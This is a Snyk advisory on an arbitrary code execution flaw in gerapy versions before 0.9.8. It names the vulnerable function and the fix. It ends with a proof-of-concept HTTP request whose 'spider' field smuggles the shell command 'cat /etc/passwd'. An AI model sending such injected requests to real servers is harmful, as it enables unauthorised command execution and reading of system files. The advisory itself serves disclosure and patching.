Snyk has a published code exploit for this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Arbitrary Code Execution vulnerabilities in an interactive lesson.
Start learningUpgrade gerapy
to version 0.9.8 or higher.
gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.
Affected versions of this package are vulnerable to Arbitrary Code Execution via the project_configure
function, by sending HTTP requests that contains malicious code.
Note: CVE-2021-44597 is a duplicate of CVE-2021-43857
POST /api/project/1/parse HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/plain, /
Authorization: Token $token
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
{"spider": "cat /etc/passwd|cat /etc/passwd"}